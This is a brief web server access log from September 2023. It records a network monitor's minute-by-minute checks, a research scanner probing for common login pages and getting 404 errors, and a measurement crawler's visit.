212.91.246.72 - - [04/Sep/2023:08:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.217.220 - - [04/Sep/2023:08:52:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.170.217.220 - - [04/Sep/2023:08:52:25 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.217.220 - - [04/Sep/2023:08:54:01 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.170.217.220 - - [04/Sep/2023:08:54:23 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.86 - - [04/Sep/2023:08:55:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
212.91.246.72 - - [04/Sep/2023:08:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.217.220 - - [04/Sep/2023:08:55:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.170.217.220 - - [04/Sep/2023:08:56:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
